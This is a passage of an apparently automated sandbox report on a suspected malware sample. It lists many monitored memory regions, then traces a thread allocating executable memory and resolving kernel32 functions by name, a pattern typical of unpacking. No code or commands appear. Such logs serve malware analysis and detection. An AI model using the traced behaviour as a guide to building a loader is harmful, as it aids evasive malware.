= 0x3280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 2154 start_va = 0x3290000 end_va = 0x3290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 2155 start_va = 0x32a0000 end_va = 0x32a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 2156 start_va = 0x32b0000 end_va = 0x32b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 2157 start_va = 0x32c0000 end_va = 0x32c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 2158 start_va = 0x32d0000 end_va = 0x32d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 2159 start_va = 0x32e0000 end_va = 0x32e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 2160 start_va = 0x32f0000 end_va = 0x32f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 2161 start_va = 0x3300000 end_va = 0x3300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2162 start_va = 0x3310000 end_va = 0x3310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 2163 start_va = 0x3320000 end_va = 0x3320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 2164 start_va = 0x3330000 end_va = 0x3330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 2165 start_va = 0x3340000 end_va = 0x3340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 2166 start_va = 0x3350000 end_va = 0x3350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2167 start_va = 0x3360000 end_va = 0x3360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 2168 start_va = 0x3370000 end_va = 0x3370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 2169 start_va = 0x3380000 end_va = 0x3380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 2170 start_va = 0x3390000 end_va = 0x3390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 2171 start_va = 0x33a0000 end_va = 0x33a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 2172 start_va = 0x33b0000 end_va = 0x33b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 2173 start_va = 0x33c0000 end_va = 0x33c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 2174 start_va = 0x33d0000 end_va = 0x33d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 2175 start_va = 0x33e0000 end_va = 0x33e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 2176 start_va = 0x33f0000 end_va = 0x33f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 2177 start_va = 0x3400000 end_va = 0x3400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2178 start_va = 0x3410000 end_va = 0x3410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 2179 start_va = 0x3420000 end_va = 0x3420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 2180 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 2181 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 2182 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 2183 start_va = 0x3460000 end_va = 0x3460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 2184 start_va = 0x3470000 end_va = 0x3470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 2185 start_va = 0x3480000 end_va = 0x3480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2186 start_va = 0x3490000 end_va = 0x3490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 2187 start_va = 0x34a0000 end_va = 0x34a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 2188 start_va = 0x34b0000 end_va = 0x34b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 2189 start_va = 0x34c0000 end_va = 0x34c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 2190 start_va = 0x34d0000 end_va = 0x34d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 2191 start_va = 0x34e0000 end_va = 0x34e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 2192 start_va = 0x34f0000 end_va = 0x34f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 2193 start_va = 0x3500000 end_va = 0x3500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2194 start_va = 0x3510000 end_va = 0x3510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 2195 start_va = 0x3520000 end_va = 0x3520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 2196 start_va = 0x3530000 end_va = 0x3530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 2197 start_va = 0x3540000 end_va = 0x3540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 2198 start_va = 0x3550000 end_va = 0x3550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003550000" filename = "" Region: id = 2199 start_va = 0x3560000 end_va = 0x3560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 2200 start_va = 0x3570000 end_va = 0x3570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 2201 start_va = 0x3580000 end_va = 0x3580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 2202 start_va = 0x3590000 end_va = 0x3590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 2203 start_va = 0x35a0000 end_va = 0x35a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 2204 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2205 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2206 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2207 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2208 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2209 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2210 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2211 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2212 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2213 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2214 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2215 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2216 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2217 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2218 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2219 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2220 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2221 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2222 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2223 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2224 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2225 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2226 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2227 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2228 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2229 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2230 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2231 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2232 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2233 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2234 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2235 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2236 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2237 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2238 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2239 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2240 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2241 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2242 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2243 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2244 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2245 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2246 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2247 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2248 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2249 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2250 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2251 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2252 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2253 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2254 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2255 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2256 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2257 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2258 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2259 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2260 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2261 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2262 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2263 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2264 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2265 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2266 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2267 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2268 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2269 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2270 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2271 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2272 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2273 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2274 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2275 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2276 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2277 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2278 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2279 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2280 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2281 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2282 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2283 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2284 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2285 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2286 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2287 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2288 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2289 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2290 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2291 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2292 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2293 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2294 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2295 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2296 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2297 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2298 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2299 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2300 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2301 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2302 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2303 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2304 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2305 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2306 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2307 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2308 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2309 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2310 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2311 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2312 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2313 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2314 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2315 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2316 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2317 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2318 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2337 start_va = 0x35c0000 end_va = 0x35dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Thread: id = 99 os_tid = 0xeb8 [0130.744] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x20d0000 [0131.457] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x2130000 [0131.462] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.483] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0131.483] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0131.483] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0131.483] VirtualAlloc (lpAddress=0x0, dwSize=0x546, flAllocationType=0x1000, flProtect=0x4) returned 0x1b0000 [0131.484] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.484] VirtualAlloc (lpAddress=0x0, dwSize=0x44400, flAllocationType=0x1000, flProtect=0x4) returned 0x20d0000 [0131.516] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.520] VirtualAlloc (lpAddress=0x0, dwSize=0x1600, flAllocationType=0x1000, flProtect=0x4) returned 0x1b0000 [0131.521] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.522] VirtualAlloc (lpAddress=0x0, dwSize=0x1400, flAllocationType=0x1000, flProtect=0x4) returned 0x1b0000 [0131.522] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.523] VirtualAlloc (lpAddress=0x0, dwSize=0x3400, flAllocationType=0x1000, flProtect=0x4) returned 0x1b0000 [0131.523] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0131.524] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0131.524] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0131.524] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0131.524] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0131.524] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="lstrlenA") returned 0x769c5a03 [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpynA") returned 0x769d18e2 [0131.525] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpyA") returned 0x769e2a6d [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExA") returned 0x769c48cb [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0131.526] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0131.527] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 